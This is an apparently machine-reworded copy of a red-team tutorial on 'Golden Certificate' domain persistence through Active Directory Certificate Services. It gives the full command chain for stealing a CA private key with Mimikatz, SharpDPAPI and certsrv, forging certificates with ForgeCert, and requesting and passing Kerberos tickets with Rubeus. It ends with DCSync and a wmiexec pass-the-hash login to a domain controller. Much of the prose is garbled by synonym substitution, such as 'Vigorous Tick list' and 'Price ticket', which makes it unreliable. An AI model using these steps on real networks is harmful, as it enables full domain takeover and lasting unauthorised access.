House endurance techniques allow red groups that experience compromised the sector to function with the very best level of privileges in a big period. One of the vital a very powerful commonplace house endurance techniques is the Golden Price ticket assault which comes to the introduction of a kerberos ticket the usage of the NTLM hash of the “krbtgt” account. Alternatively, in domain names that have deployed servers which act as Vigorous Tick list Certification Products and services and merchandise (AD CS) it’s possible to be abused for house endurance all through the fit of a compromise. That is possible by means of stealing the non-public key of the CA certificates which might permit a red team to forge and signal a certificates so as to be used for authentication. Certificates based totally authentication is enabled by means of default in a internet web page everywhere deployment of Vigorous Tick list Certification Products and services and merchandise (AD CS). Due to this fact it’s required those easy methods to be thought to be as tier-0 belongings and to be as it should be protected.
Initially this system was once performed by means of Benjamin Delpy in Mimikatz. Alternatively Will Schroeder and Lee Christensen mentioned this subject all through the Qualified Pre-Owned paper and presented a device which might be used everywhere red team operations so as to forge the CA certificates. Running beneath the radar is necessary in red team assessments and house endurance by the use of a golden certificates supply this receive advantages overview to other ways similar to DCShadow and Golden Price ticket which exist for additonal years. Acting house endurance by the use of a Golden Certificates calls for the next steps:
- Certificates Extraction (CA)
- Forge CA Certificates
- Download a Kerberos Price ticket (System account of DC)
- Carry out Switch the Price ticket
The CA certificates and the non-public key are saved all through the CA server. The use of an RDP connection to the device those might be retrieved the usage of the Another time up capability of “certsrv.msc“.
All over the certification authority over again up wizard the non-public key and the CA certificates they can each exported correct proper right into a specified location.
The CA certificates it’ll be exported as p12 document (Non-public Wisdom Business).
Alternatively, there are a couple of different strategies which can be utilized to extract the CA certificates and the non-public key from the server. Executing Seatbelt with the parameter “Certificate” can enumerate the saved CA certificate.
Mimikatz too can engage with the crypto retail outlets so as to retrieve and export certificate and personal keys. Patching the “CryptoAPI” and the “KeyIso” unexportable keys will transform exportable from numerous keys suppliers.
privilege::debug crypto::capi crypto::cng crypto::certificate /systemstore:local_machine /retailer:my /export
The certificate it’ll be extracted in each .DER and .PFX building at the disk.
SharpDPAPI will also be extensively utilized for extraction of certificate. Executing the “certificate /tool” command will use the tool certificates retailer to extract decryptable tool certificate and personal keys.
SharpDPAPI.exe certificate /tool
Every the non-public key and the certificates will displayed all through the console.
The extracted private key and the certificates will also be written correct proper right into a document with the .PEM extension. Executing the next command can convert the certificates correct proper right into a usable building as .PFX permitting for use for authentication with Rubeus.
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Supplier v1.0" -export -out cert.pfx
Forge CA Certificates
Mimikatz can be utilized to forge and signal a certificates by means of the usage of the “crypto::scauth” module. Firstly this module was once advanced for rising just right card authentication consumer certificate.The arguments required are the topic determine of the certificates authority and the patron number one determine of the patron which the certificates it’ll be created. Optionally the “/pfx” argument can be utilized to outline the filename of the certificates which goes to be created.
crypto::scauth /caname:ca /upn:[email protected]
However, ForgeCert was once advanced by means of Lee Christensen in C# and allows red groups to forge a certificates for any house consumer the usage of the CA certificates for authentication. The device will also be finished from the reminiscence of the implant and can write a document into the disk. Executing the next command will create a faux certificates for the “pentestlab” consumer which it’ll be signed by means of the non-public key of the CA certificates.
ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword Password123 --Subject CN=Consumer --SubjectAltName [email protected] --NewCertPath localadmin.pfx --NewCertPassword Password123
It will want to be well known that the certificates will have to be created for an lively consumer at the house. Due to this fact it can’t be used for the “krbtgt” account. The forging certificates may have a validity period of one one year and it’ll be skilled so long as the CA certificates is skilled (usually 5 years). Aside from of house consumer accounts, tool accounts might be used as smartly for house endurance as techniques similar to DCSync, Switch the Price ticket and S4U2Self can be used.
ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword Password123 --Subject CN=Consumer --SubjectAltName [email protected] --NewCertPath DC$.pfx --NewCertPassword Password123
Kerberos Price ticket
A Kerberos ticket will also be asked from the Key Distribution Center (KDC) the usage of the forged certificates for authentication.
Rubeus.exe asktgt /consumer:pentestlab /certificates:localadmin.pfx /password:Password123
Switch the Price ticket
The certificates which belongs to the tool account of the sector controller might be used from any host at the house so as to request a Kerberos ticket. Executing the next command will retrieve a ticket in base64 building.
Rubeus.exe asktgt /consumer:DC$ /certificates:DC$.pfx /password:Password123
The base64 ticket will also be decoded and written correct proper right into a document with the .kirbi extension.
echo "<base64>" | base64 -d > dc$.kirbi
The fee tag might be transferred into any area house home windows host and imported into any consumer consultation the usage of the transfer the price tag manner.
Rubeus.exe ptt /ticket:dc$.kirbi
For the reason that ticket belongs to the tool account of the sector controller better actions might be carried out similar to DCSync. From the existing consultation executing Mimikatz and working the command underneath will retrieve the NTLM hash of the patron Administrator which is a internet web page administrator account.
The hash might be used to get to the bottom of get admission to at the house controller the usage of transfer the hash manner or by the use of a WMI connection.
python3 wmiexec.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71 [email protected]